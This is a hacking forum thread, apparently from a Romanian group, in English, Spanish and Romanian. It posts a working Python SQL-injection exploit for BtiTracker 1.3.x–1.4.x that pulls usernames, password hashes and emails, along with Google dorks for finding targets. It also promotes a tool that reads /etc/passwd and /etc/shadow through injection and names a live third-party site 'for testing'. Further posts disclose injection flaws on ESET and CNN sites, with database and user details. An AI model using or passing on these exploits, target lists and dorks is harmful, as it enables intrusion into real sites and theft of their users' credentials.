Mensajes

What it does exactly?

Cheers

Exploit for BtiTracker CMS.
Find one [google dorks, allinurl:"BtiTracker 1.4", inurl:"reqdetails.php" & intext:"BtiTracker", etc], and type in cmd / terminal:

Código [Seleccionar] Expandir

python isr.py http://www.site.com [Number]
./isr.py isr.py http://www.site.com [Number]

And if it's vulnerable, you'll get the Username, Password [hash], and Email.

BtiTracker 1.3.x - 1.4.x  [EXPLOIT]

More HERE: http://blog.insecurity.ro/btitracker-1-3-x-1-4-x-exploit-tinkode/

Código [Seleccionar] Expandir

#!/usr/bin/env python
#
################################################################################
# ______          ____                                      __      [ xpl0it ] #
#/\__  _\        /\  _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __  __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\ \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \ \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\ \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/ \/___/  \/_/   \/_/\/__/ `/___/> \ #
#                                                   _________________   /\___/ #
#                                                   www.insecurity.ro   \/__/  #
#                                                                              #
################################################################################
#                    [ BtiTracker 1.3.X - 1.4.X Exploit ]                      #
#    Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff      #
################################################################################
#                   Because we care, we're security aware                      #
################################################################################

import sys, urllib2, re
 
if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit ==============="
    print "==============================================================="
    print "=               Discovered and coded by TinKode               ="     
    print "=                     www.InSecurity.ro                       ="
    print "=                                                             ="
    print "= Local Command:                                              ="
    print "= ./isr.py [http://webshit] [ID]                              ="
    print "=                                                             ="
    print "==============================================================="
    exit()
 
if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]
 
shit = sys.argv[1]
if shit[-1:] != "/":
    shit += "/"
 
url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"
print "\n"
print "============================================="
print "================= InSecurity ================"
print "============================================="
 
html = urllib2.urlopen(url).read()
slobod = re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html)
if len(slobod) > 0:
    print "ID       : " + str(id)
    print "Username : " + slobod[0][0]
    print "Password : " + slobod[0][1]
    print "EMail    : " + slobod[0][2]
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "Ai luat-o la gaoaza..."
     
#InSecurity.ro - Romania

the webpage, not the program

Yeah the webpage, where you saw a .exe? =))

the webpage is infected by a troyan

It's encrypted with base64, it's normally!
Decrypt the source, OMG! =))

or you may do the same in order to speak de apropiate language

I could speak in Romanian, but isn't a international language like English.
Everyone know this language.

The important thing, it's what I posted, not these things!

Screenshot:



More here: http://blog.insecurity.ro/sql-injection-column-finder-in-php-%C2%A9-isr/

Online Tool: http://insecurity.ro/columnsfinder.php

Source Code: http://www.teamwork.insecurity.ro/xfiles/%5BPHP%5D-ISR-SQL-Injection-Column-Finder---v1.0--Public-Version-.ISR


Website for testing: http://www.beckerturm-immobilien.de/images.php?id=134

Bonus: The result it's text + audio, you must listen this! ))

You can use google translate, to understand romanian language!

[Description]

Description :
This is the alpha (testing) version of ISR SQL SunBurn – ISS.
The final version will contain more stuff, but it will remain private, this doesn't mean that we won't create a public version.

So what does ISR SQL SunBurn (ISS) do ?
ISS is a php script that extracts all the possible information from a MySQL injection. Info (here we I don't refer to colons/tables/etc ... maybe in the near future). It searches and loads over 350 files with the help of load_file() – (ex /etc/passwd, /etc/shadow, etc)

Why did we decide to build this "tool"?
It's actually simple, it simplifies your work, and second of all, it's a necessity.
Hope I didn't bore you with the description, here's the video presentation of it.

Video Demonstration Here:

[youtube=425,350]http://www.youtube.com/watch?v=lQXofH2-grk[/youtube]

Mirror HIGH QUALITY: http://www.trilulilu.ro/InSecurity/153a786f8b20fd


Source: http://insecurity.ro/blog/isr-sql-sunburn-iss/

and I think, I posted in the right section (i don't know)

y que tenga bug sqli no es lo peor
no puede ser que tenga todo en texto plano!
en el segundo link hay un link a otro bug mas en otra  pagina de eset

realmente cada dia dudo mas de la gente de eset y su  supuesta seguridad...
saludos

I can't understand what you say with google translate! )
You can speak in english?

More here:

NOD32 Taiwan: http://insecurity.baywords.com/index.php/eset-nod32-taiwan-full-disclosure/
NOD32 HongKong: http://insecurity.baywords.com/index.php/eset-nod32-hong-kong-hacked/

[Oracle Injection]

CNN Oracle SQL Injection

CNN vulnerable to SQL Injection

CNN

Vulnerable to Oracle Injection
#TinKode & skpx

CNN.com is among the world’s leaders in online news and information delivery. Staffed 24 hours, seven days a week by a dedicated staff in CNN’s world headquarters in Atlanta, Georgia, and in bureaus worldwide, CNN.com relies heavily on CNN’s global team of almost 4,000 news professionals. CNN.com features the latest multimedia technologies, from live video streaming to audio packages to searchable archives of news features and background information. The site is updated continuously throughout the day.

Website vulnerable: cgi.money.cnn.com

Informations:

Version : Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production

Main Database : MONEYP1.TURNER.COM

User : TIME_USR

Owner : SYS

Columns from “Time_Owner.F500_2009“:

[1] RANK
[2] COMPANY_ID
[3] NAME
[4] REVENUE
[5] REVENUE_GROWTH
[6] PROFIT
[7] PROFIT_GROWTH
[8] PROF_PCT_REVENUE
[9] PROF_PCT_ASSETS
[10] PROF_PCT_EQUITY
[11] EPS_10YR_GROWTH
[12] TRI_10YR
[13] TRI
[14] EMPLOYEES
[15] EMPLOYEE_GROWTH

# Thanks, and have a nice day!
# TinKode